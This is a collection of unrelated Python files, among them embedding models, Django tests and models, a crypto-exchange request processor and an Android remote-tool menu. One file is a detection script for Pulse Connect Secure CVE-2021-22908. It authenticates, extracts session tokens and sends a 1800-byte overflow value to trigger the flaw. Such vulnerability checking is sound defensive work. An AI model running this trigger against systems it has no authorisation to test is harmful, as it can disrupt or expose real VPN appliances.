norms = [np.mean(np.abs(vec)) for vec in self.W_text if vec is not None]
avg_norm = np.mean(norms)
self._add_param("E", self.E_shape)
self._add_param("R", self.R_shape)
if self.num_unknown > 0:
print("%i entities with unknown text embeddings" %(self.num_unknown))
W_known = tf.Variable(self.W_text, dtype=tf.float32, trainable=self.train_words)
W_unknown = tf.Variable(init_nunif([self.num_unknown, self.text_dim]), dtype=tf.float32)
self.W = tf.concat([W_known,W_unknown], axis=0, name="W")
self.phase2_vars = [W_unknown]
if self.train_words:
self.phase2_vars.append(W_known)
else:
self.W = tf.Variable(self.W_text, dtype=tf.float32, trainable=self.train_words, name="W")
self.phase2_vars = [self.W]
self.param_names.append("W")
self._regularize(self.W)
self.M = tf.Variable(np.zeros([self.text_dim,self.dim]), dtype=tf.float32, name="M")
self.phase2_vars.append(self.M)
self.param_names.append("M")
# Replace each word vector w in self.W with w x self.M so we don't have to recompute this
# multiple times when doing prediction
self.W = tf.matmul(self.W, self.M)
def gather(self, s, p, o):
E_s, R, E_o = BaseModel.gather(self, s, p, o)
W_s = tf.gather(self.W, s)
W_o = tf.gather(self.W, o)
return E_s, W_s, R, E_o, W_o
def fit(self, X, y=None):
X = self._permute_indices(X)
BaseModel.fit(self, X, y)
self._unpermute_indices()
def _optimize(self):
phase1_vars = tf.trainable_variables()
if hasattr(self,"phase2_vars"):
for var in self.phase2_vars:
phase1_vars.remove(var)
opt1 = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss, var_list=phase1_vars)
opt2 = tf.train.AdagradOptimizer(0.01).minimize(self.loss)
self.sess = tf.Session()
init = tf.global_variables_initializer()
self.sess.run(init)
self.cur_epoch = 0
print("Optimizing - phase 1")
for epoch in range(self.epochs//2):
self._run_epoch(opt1)
print("")
print("Optimizing - phase 2")
for epoch in range(self.epochs//2):
self._run_epoch(opt2)
print("")
tf_objects = [getattr(self, attr) for attr in self.param_names]
vals = self.sess.run(tf_objects)
for attr,val in zip(self.param_names,vals):
setattr(self, attr, val)
class TransEFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return -tf.reduce_sum(tf.abs(E_s + R - E_o), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return -np.sum(np.abs(es + r - eo), axis=-1)
class RESCALFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
self.learning_rate = kwargs.pop("learning_rate",0.1)
self.reg = 0.01
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return tf.reduce_sum(vec_mat_mul(E_s, R) * E_o, axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return np.sum(np.matmul(es, r) * eo, axis=-1)
class HolEFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.learning_rate = kwargs.pop("learning_rate",0.1)
self.reg = 0.01
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return tf.reduce_sum(R * tf_ccorr(E_s, E_o), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return np.sum(r * np_ccorr(es, eo), axis=-1)
class TransRFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.reg = 0.01
self.train_words = False
def create_params(self):
BaseFeatureSumModel.create_params(self)
self._add_param("Mr", self.R_shape + [self.R_shape[-1]])
def gather(self, s, p, o):
E_s, W_s, R, E_o, W_o = BaseFeatureSumModel.gather(self, s, p, o)
Mr = tf.gather(self.Mr, p)
return E_s, W_s, R, Mr, E_o, W_o
def train_score(self, s, p, o):
E_s, W_s, R, Mr, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
E_sr = vec_mat_mul(E_s, Mr)
E_or = vec_mat_mul(E_o, Mr)
return -tf.reduce_sum(tf.abs(E_sr + R - E_or), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
Mr = self.Mr[pi]
esp = np.matmul(es, Mr)
eop = np.matmul(eo, Mr)
return -np.sum(np.abs(esp + r - eop), axis=-1)
class SEFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim, self.dim]
self.reg = 0.01
self.train_words = False
def create_params(self):
BaseFeatureSumModel.create_params(self)
self._add_param("R1", self.R_shape)
self._add_param("R2", self.R_shape)
def gather(self, s, p, o):
E_s, W_s, R, E_o, W_o = BaseFeatureSumModel.gather(self, s, p, o)
R1 = tf.gather(self.R1, p)
R2 = tf.gather(self.R2, p)
return E_s, W_s, E_o, W_o, R1, R2
def train_score(self, s, p, o):
E_s, W_s, E_o, W_o, R1, R2 = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
E_sr = vec_mat_mul(E_s, R1)
E_or = vec_mat_mul(E_o, R2)
return -tf.reduce_sum(tf.abs(E_sr - E_or), axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
R1 = self.R1[pi]
R2 = self.R2[pi]
esr = np.matmul(es, R1)
eor = np.matmul(eo, R2)
return -np.sum(np.abs(esr - eor), axis=-1)
class DistMultFeatureSum(BaseFeatureSumModel):
def __init__(self, ne, nr, dim, samplef, W_text, **kwargs):
BaseFeatureSumModel.__init__(self, ne, nr, dim, samplef, W_text, **kwargs)
self.R_shape = [self.nr, self.dim]
self.train_words = True
def train_score(self, s, p, o):
E_s, W_s, R, E_o, W_o = self.gather(s, p, o)
E_s = E_s + W_s
E_o = E_o + W_o
return tf.reduce_sum(E_s * R * E_o, axis=-1)
def score(self, si, pi, oi):
es = self.E[si] + self.W[si]
eo = self.E[oi] + self.W[oi]
r = self.R[pi]
return np.sum(es * r * eo, axis=-1)
|
def opt():
import option
r = "\033[31m"
g = "\033[32m"
y = "\033[33m"
print(f"{g}[{r}0{g}]{y}list tools properties")
print(f"{g}[{r}1{g}]{y}screen")
print(f"{g}[{r}2{g}]{y}battery")
print(f"{g}[{r}3{g}]{y}activity")
print(f"{g}[{r}4{g}]{y}system info")
print(f"{g}[{r}5{g}]{y}type")
print(f"{g}[{r}6{g}]{y}net state")
print(f"{g}[{r}7{g}]{y}restart")
print(f"{g}[{r}8{g}]{y}wifi on")
print(f"{g}[{r}9{g}]{y}wifi off")
print(f"{g}[{r}10{g}]{y}openurl")
print(f"{g}[{r}11{g}]{y}adv prop")
print(f"{g}[{r}12{g}]{y}shell")
print(f"{g}[{r}13{g}]{y}download")
print(f"{g}[{r}14{g}]{y}upload")
print(f"{g}[{r}15{g}]{y}keycode")
print(f"{g}[{r}16{g}]{y}about Developer")
print(f"{g}[{r}17{g}]{y}tool not working?")
print(f"{g}[{r}18{g}]{y}add new tool")
print(f"{g}[{r}00{g}]{y}exit")
|
from django.utils.translation import gettext as _
def test_location_list(francoralite_context):
for username in francoralite_context.USERNAMES:
# Open the locations list page for each profile
francoralite_context.open_homepage(auth_username=username)
francoralite_context.open_url('/location_gis/')
# Verify the label of the location page
francoralite_context.verify_title(_('Lieux'))
# Verify buttons
has_buttons = username in francoralite_context.WRITERS
assert has_buttons == francoralite_context.exists_element(by_link_url='/location_gis/add')
# And, then logout (if authenticated user)
if username:
francoralite_context.logout(username)
def test_location_details(francoralite_context):
for username in francoralite_context.USERNAMES:
# Open the first collection page for each profile
francoralite_context.open_homepage(auth_username=username)
francoralite_context.open_url('/location_gis/1')
# Verify data
data = {
'id_code': "poitiers",
'id_latitude': '46.5802596',
'id_longitude': '0.340196',
}
francoralite_context.verify_data(data)
# Verify buttons
has_buttons = username in francoralite_context.WRITERS
assert has_buttons == francoralite_context.exists_element(by_link_url='/location_gis/edit/1')
assert has_buttons == francoralite_context.exists_element(by_button_url='/location_gis/delete/1')
# And, then logout (if authenticated user)
if username:
francoralite_context.logout(username)
def test_location_add(francoralite_context):
last_id = 3
for username in francoralite_context.WRITERS:
last_id = last_id + 1
# Open the first location page for each profile
francoralite_context.open_homepage(auth_username=username)
francoralite_context.open_url('/location_gis/')
# Click on the "add" link
francoralite_context.find_element(by_link_url='/location_gis/add').click()
# Write content
content = {
'id_code': 'cherves',
'id_name': "Cherves, Poitiers, Vienne, Nouvelle-Aquitaine, France métropolitaine, 86170, France",
'id_latitude': '46.7175881',
'id_longitude': '0.0189083',
}
francoralite_context.fill_data(content)
# Validation
francoralite_context.find_element(by_id='save').click()
# Go to the new mission
francoralite_context.open_url('/location_gis/' + str(last_id))
# Verify content
del content["id_name"]
francoralite_context.verify_data(content)
# And, then logout (if authenticated user)
if username:
francoralite_context.logout(username)
|
#### import the simple module from the paraview
from paraview.simple import *
# Create a wavelet and clip it with a Cylinder.
wavelet = Wavelet()
Show()
clip = Clip()
clip.ClipType = "Cylinder"
clip.InsideOut = True
cylinder = clip.ClipType
cylinder.Axis = [-1, 1, -1]
cylinder.Center = [8, 4, -3]
cylinder.Radius = 3
Show()
Render()
# compare with baseline image
import os
import sys
try:
baselineIndex = sys.argv.index('-B')+1
baselinePath = sys.argv[baselineIndex]
except:
print ("Could not get baseline directory. Test failed.")
exit(1)
baseline_file = os.path.join(baselinePath, "TestClipCylinder.png")
import vtk.test.Testing
vtk.test.Testing.VTK_TEMP_DIR = vtk.util.misc.vtkGetTempDir()
vtk.test.Testing.compareImage(GetActiveView().GetRenderWindow(), baseline_file,
threshold=25)
vtk.test.Testing.interact()
|
import threading
import time
import traceback
import ccxt
import json
import datetime
import logging
import os
import click
import uuid
import queue
import collections
import etcd3
import simpleProducer
import configurationService
STOP_REQUEST = "StopRequest"
MAX_REQUEST_LAG = 100
class CcxtRequestProcessor(object):
def __init__(self, producer, status_producer, configuration_service,
listener_id, exchange, initial_key, initial_request):
self.exchange = exchange
self.queue = queue.Queue()
self.key_counter = collections.Counter()
self._listener_id = listener_id
self._initial_key = initial_key,
self._initial_request = initial_request,
self._producer = producer
self._status_producer = status_producer
self._configuration_service = configuration_service
self._exchange_api = None
self._thread = threading.Thread(target=self.run, daemon = True)
def start(self):
self._thread.start()
def stop(self):
self.queue.put(STOP_REQUEST)
def put(self, request):
lib = request['value']['lib']
exchange = request['value']['exchange']
call = request['value']['call']
args = request['value']['args']
processor_key = "{}.{}.{}.({})".format(lib, exchange, call, str(args))
self.key_counter[processor_key] += 1
request['processor_key'] = processor_key
request['request_sequence_nr'] = self.key_counter[processor_key]
self.queue.put(request)
def run(self):
try:
self._exchange_api = getattr(ccxt, self.exchange)()
self._configuration_service.put_status(
"exchange",
"{}.{}".format("ccxt", self.exchange),
{
"lib" : "ccxt",
"exchange" : self.exchange,
"start_time" : datetime.datetime.now()
})
while True:
request = None
try:
request = self.queue.get(block = True)
request_value = request['value']
if request == STOP_REQUEST:
break
self.process_request(**request)
self.queue.task_done()
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self._listener_id, request_value, ex, trace)
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self._initial_key, self._initial_request, ex, trace)
def process_request(self, **kwargs):
request = kwargs['value']
lib = kwargs['value']['lib']
exchange = kwargs['value']['exchange']
call = kwargs['value']['call']
args = kwargs['value']['args']
key = kwargs['value']['key']
assert lib == "ccxt"
assert exchange == self.exchange
processor_key = kwargs['processor_key']
request_sequence_nr = kwargs['request_sequence_nr']
current_sequence_nr = self.key_counter[processor_key]
# skip requests if there are more requests with same key in queue
# allow some lag to ensure at least some requests are always processed
warning = None
skip = False
if request_sequence_nr < current_sequence_nr - MAX_REQUEST_LAG:
skip = True
warning_dict = {
'processor_key' : processor_key,
'request_sequence_nr' :request_sequence_nr,
'current_sequence_nr' : current_sequence_nr
}
msg = "Skipping request with processor_key={processor_key}, " \
"request_sequence_nr={request_sequence_nr}, " \
"current_sequence_nr={current_sequence_nr}".format(**warning_dict)
logging.warn(msg)
warning = self._send_status_warn(msg, self._listener_id, request, warning_dict)
if 'request_timestamp' in kwargs['value']:
request_timestamp = kwargs['value']['request_timestamp']
else:
request_timestamp = kwargs['timestamp']
request_result = None
error = None
if not skip:
try:
request_result = getattr(self._exchange_api,call)(**args)
self.fix_keys(request_result)
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
error = self._send_status_error(msg, self._listener_id, request, ex, trace)
result={
"exchange": exchange,
"call": call,
"args": args,
"request_timestamp" : request_timestamp,
"call_timestamp" : kwargs['rec_timestamp'],
"result_timestamp" : datetime.datetime.now(),
"result" : request_result,
"ticker_id" : kwargs['value']['ticker_id'],
"key" : key,
"request_id" : kwargs['value']['request_id'],
"sequence_nr" : kwargs['value']['sequence_nr'],
"request_processor_id" : kwargs['value']['processor_id'],
"result_processor_id" : self._listener_id,
"lib" : lib
}
if warning:
del warning['details']['request']
result = {**result, **{
"warning" : warning['details'],
"status" : "warning"
}}
if error:
del error['details']['request']
result = {**result, **{
"error" : error['details'],
"status" : "error"
}}
logging.debug("Sending result {}".format(result))
logging.info("Sending result {}".format({k:result[k] for k in result if k not in set([
'result','call','args','lib'])}))
try:
self._producer.send(
key=key,
value=result)
except Exception as ex:
msg = "Error processing requests to exchange {}".format(self.exchange)
logging.error(msg)
logging.debug(ex)
trace = traceback.format_exc()
logging.debug(trace)
self._send_status_error(msg, self._listener_id, request, ex, trace)
def fix_keys(self, dictionary, match='.', replace_by='.'):
if isinstance(dictionary, str):
return
if isinstance(dictionary, collections.abc.Mapping):
for k in list(dictionary.keys()):
if isinstance(dictionary[k], collections.abc.Mapping):
self.fix_keys(dictionary[k], match, replace_by)
elif isinstance(dictionary[k], collections.abc.Sequence):
self.fix_keys(dictionary[k], match, replace_by)
if isinstance(k, str) and k.find(match) > -1:
logging.debug("Fixing key {}".format(k))
value = dictionary[k]
new_key = k.replace(match, replace_by)
del dictionary[k]
dictionary[new_key] = value
logging.debug("Fixed key {}".format(new_key))
elif isinstance(dictionary, collections.abc.Sequence):
for item in dictionary:
self.fix_keys(item, match, replace_by)
def _send_status_error(self, msg, key, request, exception, trace):
try:
if isinstance(key, bytes):
try:
key = uuid.UUID(bytes=key)
except:
key = str(key)
status = {
"id" : key,
"result" : "exception",
"details" : {
"exception" : str(exception),
"type" : str(type(exception)),
"trace" : str(trace),
"request" : request,
"message" : msg
},
"error" : True,
"processor_id" : self._listener_id
}
self._status_producer.send(key=key, value=status)
return status
except Exception as ex:
logging.error("Error sending status")
logging.debug(ex)
logging.debug(traceback.format_exc())
def _send_status_warn(self, msg, key, request, warning_dict):
try:
if isinstance(key, bytes):
try:
key = uuid.UUID(bytes=key)
except:
key = str(key)
status = {
"id" : key,
"result" : "warning",
"details" : {**{
"request" : request,
"message" : msg
}, **warning_dict},
"warning" : True,
"processor_id" : self._listener_id
}
self._status_producer.send(key=key, value=status)
return status
except Exception as ex:
logging.error("Error sending status")
logging.debug(ex)
logging.debug(traceback.format_exc())
|
class CommandLine() :
def __init__(self, inOpts=None) :
import argparse
self.parser = argparse.ArgumentParser(description = 'Extended Depth of Focus Image Processing Algorithm',
epilog = 'Takes, in multiple layers of image data of a given subject, and spits out a single infocus image of said subject.',
add_help = True,
prefix_chars = '-',
usage = '%(prog)s [options] -option1[default] <input >output'
)
self.parser.add_argument('-i','--images',action='append',default = None, help='Select the image/folder of images you choose to run the algorithm on.')
self.parser.add_argument('-a','--algorithm', action = 'store', choices=('laplacian','sobel') , default = 'laplacian', help='Select the type of algorithm you want to run. Either Laplacian, or Sobel.' )
self.parser.add_argument('-o','--outputD',action='store', help ='Name the output directory you wish to output to.')
self.parser.add_argument('-n','--namingS',action = 'store', type = str, default= 'EDoFIP Output', help = 'Name the naming scheme you wish for the output images.')
if inOpts is None :
self.args = self.parser.parse_args()
else :
self.args = self.parser.parse_args(inOpts)
|
#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass
parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname)')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')
args = parser.parse_args()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class formvaluefinder(HTMLParser):
def __init__(self, searchval):
super(type (self), self).__init__()
self.searchval = searchval
def handle_starttag(self, tag, attrs):
if tag == 'input':
# We're just looking for form <input> tags
foundelement = False
for attr in attrs:
if(attr[0] == 'name'):
if(attr[1] == self.searchval):
foundelement = True
elif(attr[0] == 'value' and foundelement == True):
self.data = attr[1]
class preauthfinder(HTMLParser):
foundelement = False
def handle_starttag(self, tag, attrs):
if tag == 'textarea':
# We're just looking for <textarea> tags
foundelement = False
for attr in attrs:
if(attr[0] == 'id'):
if(attr[1] == 'sn-preauth-text_2'):
self.foundelement = True
def handle_data(self, data):
if self.foundelement:
self.data = data
self.foundelement = False
def get_realm(host, defaulturi):
realm = None
print('Getting default realm for %s...' % host)
url = 'https://%s%s' % (host,defaulturi)
res = None
try:
res = requests.get(url, verify=False, timeout=10)
except requests.exceptions.ConnectionError:
print('Error retrieving %s' % url)
if res:
if res.status_code == 200:
html = str(res.content)
if 'sn-preauth-text_2' in html:
print('Preauth required...')
parser = preauthfinder()
parser.feed(html)
preauthtext = parser.data
values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
if res.content:
parser = formvaluefinder('realm')
parser.feed(str(res.content))
realm = parser.data
else:
print('Error retrieving login page')
else:
parser = formvaluefinder('realm')
parser.feed(html)
realm = parser.data
return realm
def get_dsid(host, defaulturi, realm, user, password):
dsid = None
loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
url = 'https://%s%s' % (host,loginuri)
values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
if 'confirm' in res.headers['location']:
# Redirect to "user-confirm" that they still want to log in, despite already
# having an active session
print('User session is already active! Proceeding...')
res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
parser = formvaluefinder('FormDataStr')
parser.feed(str(res.content))
formdata = parser.data
values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
elif 'cred' in res.headers['location']:
# This is a pulse that requires 2FA
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
for cookie in res.cookies:
if cookie.name == 'id':
key = cookie.value
password2 = input('MFA code: ')
values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
cookies = {'id': key, 'DSSigninNotif': '1'}
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
if 'confirm' in res.headers['location']:
# Redirect to "user-confirm" that they still want to log in, despite already
# having an active session
print('User session is already active! Proceeding...')
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
parser = formvaluefinder('FormDataStr')
parser.feed(str(res.content))
formdata = parser.data
values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
else:
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
elif 'failed' in res.headers['location']:
print('Login failed!')
else:
# Login accepted
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
return dsid
def get_xsauth(host, dsid):
xsauth = None
url = 'https://%s/dana/home/index.cgi' % host
cookies = {'DSID':dsid}
res = requests.get(url, verify=False, cookies=cookies, timeout=10)
if 'xsauth' in str(res.content):
parser = formvaluefinder('xsauth')
parser.feed(str(res.content))
xsauth = parser.data
else:
print('Cannot find xsauth string for provided DSID: %s' % dsid)
return xsauth
def trigger_vul(host, dsid, xsauth):
url = 'https://%s/dana/fb/smb/wnf.cgi' % host
values = {
't': 's',
'v': '%s,,' % ('A' * 1800),
'dir': 'tmp',
'si': None,
'ri': None,
'pi': None,
'confirm': 'yes',
'folder': 'tmp',
'acttype': 'create',
'xsauth': xsauth,
'create': 'Create Folder',
}
cookies = {'DSID': dsid}
try:
res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
status = res.status_code
if 'DSIDFormDataStr' in str(res.content):
# We got page asking to confirm our action
print('xsauth value was not accepted')
else:
if status == 200 and 'Error FB-8' in str(res.content):
print('HTTP %s. Windows File Access Policies prevents exploitation.' % status)
elif status == 200:
print('HTTP %s. Not vulnerable.' % status)
elif status == 403:
print('HTTP %s. XML workaround applied.' % status)
elif status == 500:
print('HTTP %s. %s is vulnerable to CVE-2021-22908!' % (status, host))
elif status == 302:
print('HTTP %s. Are you sure your DSID is valid?' % host)
else:
print('HTTP %s. Not sure how to interpret this result.' % status)
except requests.exceptions.ReadTimeout:
print('No response from server. Try again...')
def get_default(host):
url = 'https://%s' % host
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
try:
location = res.headers['location']
if 'dana-na' not in location:
print('%s does not seem to be a PCS host' % host)
location = None
except:
pass
return location
def check_xml(host):
url = 'https://%s/dana/meeting' % host
#print('Checking status of %s ...' % url)
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
if res.status_code == 403:
print('Workaround-2104 appears to be installed')
else:
print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')
url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
#print('Checking status of %s ...' % url)
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
if res.status_code == 403:
print('Workaround-2105 appears to be installed')
else:
print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')
host = args.host
if args.noauth:
check_xml(host)
else:
defaulturi = get_default(host)
if defaulturi:
if not args.realm:
realm = get_realm(host, defaulturi)
else:
realm = args.realm
if realm:
print('Realm: %s' % realm)
if not args.user and not args.dsid:
user = input('User: ')
else:
user = args.user
if not args.password and not args.dsid:
password = getpass.getpass()
else:
password = args.password
if not args.dsid:
dsid = get_dsid(host, defaulturi, realm, user, password)
print('DSID: %s' % dsid)
else:
dsid = args.dsid
if dsid:
if not args.xsauth:
xsauth = get_xsauth(host, dsid)
print('xsauth: %s' % xsauth)
else:
xsauth = args.xsauth
if xsauth:
trigger_vul(host, dsid, xsauth)
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import io
import tarfile
from ..exceptions import NodeNotFoundError
from ..utils import get_container
logger = logging.getLogger(__name__)
def main(args):
if args.source == args.destination:
raise ValueError('Cannot have the same source and destination')
if ':' in args.source and ':' in args.destination:
src_container = _find_container(args.source.split(':')[0])
dest_container = _find_container(args.destination.split(':')[0])
src_path = args.source.split(':')[1]
dest_path = args.destination.split(':')[1]
tarstream = io.BytesIO()
for chunk in src_container.get_archive(path=src_path)[0]:
tarstream.write(chunk)
tarstream.seek(0)
dest_container.put_archive(path=dest_path, data=tarstream)
elif ':' in args.source:
src_container = _find_container(args.source.split(':')[0])
src_path = args.source.split(':')[1]
tarstream = io.BytesIO()
for chunk in src_container.get_archive(path=src_path)[0]:
tarstream.write(chunk)
tarstream.seek(0)
with tarfile.open(fileobj=tarstream) as tarfile_:
tarfile_.extractall(path=args.destination)
elif ':' in args.destination:
dest_container = _find_container(args.destination.split(':')[0])
dest_path = args.destination.split(':')[1]
data = io.BytesIO()
with tarfile.open(fileobj=data, mode='w') as tarfile_:
tarfile_.add(args.source, arcname=args.source.split('/')[-1])
data.seek(0)
dest_container.put_archive(path=dest_path, data=data)
else:
raise ValueError('Source node FQDN or Destination node FQDN required')
def _find_container(node):
container = get_container(hostname=node)
if not container:
raise NodeNotFoundError(node)
return container
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
# Create your views here.
def home(request):
template_name = 'home.html'
return render(request, template_name)
def contato(request):
template_name = 'contato.html'
return render(request, template_name)
def about(request):
template_name = 'about.html'
return render(request, template_name)
|
from unittest.runner import TextTestResult
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
# Create your models here.
class Neighborhood(models.Model):
name = models.CharField(max_length=30)
location = models.CharField(max_length=50)
neighborhood_desc=models.TextField()
occupants_count=models.IntegerField(default=0)
health_tell = models.IntegerField(null=True, blank=True)
police_number = models.IntegerField(null=True, blank=True)
def __str__(self):
return self.name
def save_neighborhood(self):
self.save()
def delete_neighborhood(self):
self.delete()
@classmethod
def find_neighborhood(cls, name):
return cls.objects.filter(name_icontains=name)
@classmethod
def update_neighborhood(cls, id, name):
update = cls.objects.filter(id=id).update(name=name)
return update
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile', null=True)
name = models.CharField(max_length=50)
profile_pic = models.ImageField(upload_to='profile_photos/')
email = models.EmailField()
neighborhood = models.ForeignKey(Neighborhood,related_name='occupants', on_delete=models.CASCADE,null=True)
def __str__(self):
return self.name
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, created=False, **kwargs):
instance.profile.save()
def save_user(self):
self.save()
def delete_user(self):
self.delete()
class Business(models.Model):
name=models.CharField(max_length=50)
business_desc=models.TextField()
profile=models.ForeignKey(Profile,on_delete=models.CASCADE,related_name='business_user',null=True)
business_email=models.EmailField()
neighborhood=models.ForeignKey(Neighborhood,on_delete=models.CASCADE)
def __str__(self):
return self.name
def save_business(self):
self.save()
def delete_business(self):
self.delete()
@classmethod
def find_business(cls, name):
return cls.objects.filter(name_icontains=name)
@classmethod
def update_business(cls, id, name):
update = cls.objects.filter(id=id).update(name=name)
return update
class Post(models.Model):
post_name=models.CharField(max_length=100)
post_content=models.TextField()
pub_date=models.DateTimeField(auto_now_add=True)
profile=models.ForeignKey(Profile,on_delete=models.CASCADE, related_name='post',null=True)
neighborhood=models.ForeignKey(Neighborhood,on_delete=models.CASCADE,related_name='post_hood',null=True)
def __str__(self):
return self.post_name
|
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import Pipeline
from sklearn.datasets import fetch_20newsgroups
from sklearn import metrics
import joblib
from api import CAT
if __name__ == "__main__":
# Just grab the training set:
newsgroups_train = fetch_20newsgroups(
subset="train", categories=CAT, shuffle=True, random_state=42
)
# Create our processing pipeline and train it
text_clf = Pipeline(
[("tfidf", TfidfVectorizer()), ("clf", MultinomialNB(alpha=0.01))]
)
text_clf.fit(newsgroups_train.data, newsgroups_train.target)
# Now we save it to a pickle
joblib.dump(text_clf, "pipeline.pkl")
# To test:
newsgroups_test = fetch_20newsgroups(subset="test", categories=CAT)
pred = text_clf.predict(newsgroups_test.data)
f1 = metrics.f1_score(newsgroups_test.target, pred, average="macro")
print("F1 score: {:.03f}".format(f1))
|
# -*- coding: utf-8 -*-
import pytest
from tennis import TennisGame3
from tennis_unittest import test_cases, play_game
class TestTennis:
@pytest.mark.parametrize('p1Points p2Points score p1Name p2Name'.split(), test_cases)
def test_get_score_game3(self, p1Points, p2Points, score, p1Name, p2Name):
game = play_game(TennisGame3, p1Points, p2Points, p1Name, p2Name)
assert score == game.score()
|
from typing import List
from injector import inject
from pandas import DataFrame
from pdip.integrator.connection.base import ConnectionTargetAdapter
from pdip.integrator.connection.types.sql.base import SqlProvider
from pdip.integrator.integration.domain.base import IntegrationBase
